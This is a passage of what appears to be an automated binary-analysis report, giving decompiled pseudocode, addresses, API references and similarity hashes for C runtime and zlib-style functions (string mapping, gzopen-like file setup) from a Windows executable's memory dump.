										_t59 = _t59 ^  *_t55;
										__eflags = _t59;
									}
									_t42 = _t42 >> 1;
									_t55 =  &(_t55[1]);
									__eflags = _t42;
								}
								_t42 = _t59;
							}
							goto L32;
						}
						break;
						L32:
						_a12 = _t49 >> 1;
					} while (__eflags != 0);
					_t43 = _t42 ^ _a8;
					__eflags = _t43;
					return _t43;
				} else {
					return _a4;
				}
			}

0x00402f20
0x00402f2e
0x00402f3e
0x00402f43
0x00402f4a
0x00402f50
0x00402f50
0x00402f53
0x00402f54
0x00402f56
0x00402f56
0x00402f69
0x00402f79
0x00402f7e
0x00402f85
0x00402f85
0x00402f90
0x00402f90
0x00402f94
0x00402f96
0x00402f9a
0x00402f9c
0x00402fa0
0x00402fa3
0x00402fa5
0x00402fa5
0x00402fa5
0x00402fa7
0x00402fa9
0x00402fac
0x00402fac
0x00402fb0
0x00402fb7
0x00402fba
0x00402fba
0x00402fc2
0x00402fc9
0x00402fcc
0x00402fce
0x00402fd0
0x00402fd7
0x00402fd9
0x00402fe0
0x00402fe2
0x00402fe4
0x00402fe4
0x00402fe4
0x00402fe6
0x00402fe8
0x00402feb
0x00402feb
0x00402fef
0x00402fef
0x00402ff1
0x00402ff3
0x00402ff5
0x00403000
0x00403000
0x00403007
0x00403009
0x00403010
0x00403012
0x00403014
0x00403017
0x00403019
0x00403019
0x00403019
0x0040301b
0x0040301d
0x00403020
0x00403020
0x00403024
0x00403028
0x0040302b
0x0040302b
0x00403033
0x00403036
0x00403038
0x0040303a
0x0040303e
0x00403040
0x00403042
0x00403044
0x00403046
0x00403046
0x00403046
0x00403048
0x0040304a
0x0040304d
0x0040304d
0x00403051
0x00403051
0x00000000
0x00403036
0x00000000
0x00403053
0x00403055
0x00403055
0x00403062
0x00403062
0x00403072
0x00402f30
0x00402f3d
0x00402f3d

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795

Uniqueness

Uniqueness Score: -1.00%

Function 00402F89, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785

Uniqueness

Uniqueness Score: -1.00%

Function 00417081, Relevance: 31.8, APIs: 21, Instructions: 340
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x11f9a93f
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}

0x00417089
0x00417090
0x00417098
0x0041709a
0x004170a0
0x004170a6
0x004170bb
0x004170c5
0x004170cb
0x004170ce
0x004170d0
0x004170d0
0x004170bd
0x004170bd
0x004170bd
0x004170bb
0x004170dd
0x00417101
0x00417101
0x00417109
0x004172bb
0x004172be
0x004172c1
0x004172c4
0x004172cb
0x004172cb
0x004172ce
0x004172d1
0x004172d8
0x004172d8
0x004172de
0x004172e4
0x004172e7
0x004172ea
0x004172f3
0x004172f6
0x004173ef
0x004173f1
0x004173f1
0x004173f4
0x004173f6
0x004173f9
0x004173fe
0x004173ff
0x00417402
0x00417404
0x00417406
0x00417409
0x0041740b
0x0041740c
0x00417411
0x00417409
0x00417412
0x00000000
0x00417412
0x00417309
0x0041730e
0x00417311
0x00417314
0x00417316
0x00000000
0x00000000
0x0041732a
0x0041732c
0x0041732f
0x00417331
0x0041733a
0x00417379
0x00417379
0x00417379
0x0041737b
0x0041737b
0x0041737d
0x00000000
0x00000000
0x00417384
0x0041739c
0x0041739e
0x004173a1
0x004173a3
0x004173bf
0x004173c1
0x004173c9
0x004173cb
0x004173cb
0x004173a5
0x004173a5
0x004173a5
0x004173cf
0x00000000
0x004173d4
0x0041733c
0x0041733f
0x00000000
0x00000000
0x00417341
0x00417344
0x00417349
0x00417362
0x00417368
0x0041736a
0x0041736c
0x00417372
0x00417372
0x00417372
0x00417375
0x00000000
0x00417375
0x0041734b
0x00417350
0x00417352
0x00417354
0x00000000
0x00000000
0x00417356
0x0041735c
0x00000000
0x0041735c
0x00417333
0x00417333
0x00000000
0x00000000
0x00000000
0x00000000
0x00417117
0x0041711a
0x004172ec
0x004172ec
0x00417414
0x00417425
0x00417425
0x00417120
0x00417126
0x0041712d
0x0041712d
0x00417130
0x00417153
0x00417155
0x00417157
0x00000000
0x0041715d
0x0041715d
0x004171a2
0x004171a2
0x004171a5
0x004171a8
0x00000000
0x00000000
0x004171c1
0x004172aa
0x004172ad
0x004172b2
0x00000000
0x004172b5
0x004171c7
0x004171db
0x004171dd
0x004171e2
0x00000000
0x00000000
0x004171ef
0x0041721a
0x0041721c
0x00417263
0x00417263
0x00417263
0x00417265
0x00417265
0x00417267
0x00417277
0x0041727d
0x0041727f
0x00417281
0x00417282
0x00417283
0x00417286
0x0041728c
0x0041728f
0x00417288
0x00417288
0x00417289
0x00417289
0x004172a0
0x004172a0
0x004172a4
0x004172a9
0x00000000
0x00417267
0x00417222
0x00417223
0x00417225
0x00417228
0x00000000
0x00000000
0x0041722a
0x0041722a
0x0041722e
0x00417233
0x0041724c
0x00417252
0x00417254
0x00417256
0x0041725c
0x0041725c
0x0041725c
0x0041725f
0x00000000
0x0041725f
0x00417235
0x0041723a
0x0041723c
0x0041723e
0x00000000
0x00000000
0x00417240
0x00417246
0x00000000
0x00417246
0x004171f4
0x00417213
0x00417213
0x00000000
0x004171f4
0x00417163
0x00417164
0x00417169
0x00000000
0x00000000
0x0041716b
0x0041716b
0x00417174
0x0041718a
0x00417190
0x00417192
0x0041719d
0x0041719d
0x00000000
0x0041719d
0x00417194
0x0041719a
0x0041719a
0x00000000
0x0041719a
0x00417176
0x0041717b
0x0041717f
0x00000000
0x00000000
0x00417181
0x00000000
0x00417181
0x00417157
0x00417109
0x004170df
0x004170e2
0x004170e5
0x004170e5
0x004170e8
0x00000000
0x00000000
0x004170ea
0x004170ed
0x00000000
0x00000000
0x004170ef
0x00000000
0x004170ef
0x004170f7
0x004170fb
0x004170fd
0x004170fd
0x004170fe
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02341888), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 327be59bda995badbea21f4fb05b3adfcf6f1a20c0da7224c9bc53d29d8b02f4
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 327be59bda995badbea21f4fb05b3adfcf6f1a20c0da7224c9bc53d29d8b02f4
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057B0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

0x004057b7
0x004057bf
0x004057c3
0x004057c5
0x004057cd
0x004059c8
0x004059ce
0x004057db
0x004057e3
0x004057e5
0x004057ea
0x00405921
0x0040592a
0x004057f0
0x004057f3
0x004057f6
0x004057f9
0x004057fc
0x004057ff
0x00405801
0x00405804
0x00405807
0x0040580a
0x0040580d
0x00405810
0x00405813
0x00405816
0x00405819
0x0040581c
0x00405824
0x00405827
0x0040582b
0x0040582e
0x00405831
0x00405834
0x00405837
0x00405837
0x00405839
0x0040583a
0x00405842
0x00405847
0x0040584a
0x0040584f
0x0040591c
0x0040591c
0x00000000
0x00405855
0x00405855
0x00405859
0x0040585b
0x00000000
0x00405870
0x00405872
0x00405874
0x00405874
0x00405877
0x0040587b
0x00405881
0x00405881
0x00405885
0x00405889
0x00405897
0x00405899
0x004058a5
0x004058a7
0x004058b3
0x004058b5
0x004058c1
0x004058c5
0x004058c7
0x004058c7
0x004058c8
0x004058b7
0x004058b7
0x004058b7
0x004058a9
0x004058a9
0x004058a9
0x0040589b
0x0040589b
0x0040589b
0x0040588f
0x00405892
0x00405892
0x004058cc
0x004058cf
0x00000000
0x00000000
0x004058d1
0x004058d9
0x00000000
0x00000000
0x004058db
0x004058db
0x004058e0
0x00000000
0x004058e2
0x004058e4
0x00405930
0x0040593f
0x00405942
0x00405944
0x00405949
0x0040594c
0x0040594e
0x00000000
0x00405950
0x00405950
0x00405953
0x00000000
0x00000000
0x00000000
0x00000000
0x00405953
0x004058e6
0x004058ea
0x004058ec
0x004058f1
0x004058f2
0x004058f4
0x004058f6
0x004058f8
0x004058f9
0x00405904
0x00405906
0x0040590b
0x0040590e
0x00405911
0x00405916
0x00000000
0x00405955
0x00405955
0x00405955
0x00405961
0x00405963
0x00405967
0x0040596d
0x0040596e
0x0040597c
0x0040597d
0x00405970
0x00405970
0x00405974
0x00405975
0x00405975
0x00405985
0x00405988
0x0040598a
0x00000000
0x0040598c
0x0040598c
0x00405990
0x004059a5
0x004059ad
0x004059b6
0x004059b6
0x004059b9
0x004059c5
0x00405992
0x00405992
0x004059a2
0x004059a2
0x00405990
0x0040598a
0x00405916
0x004058e4
0x00000000
0x00405860
0x00405860
0x00405862
0x00405864
0x00405865
0x00405868
0x00000000
0x0040586a
0x0040586a
0x0040586d
0x00000000
0x00405868
0x0040584f
0x004057ea
0x00000000

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC2, Relevance: 10.7, APIs: 7, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
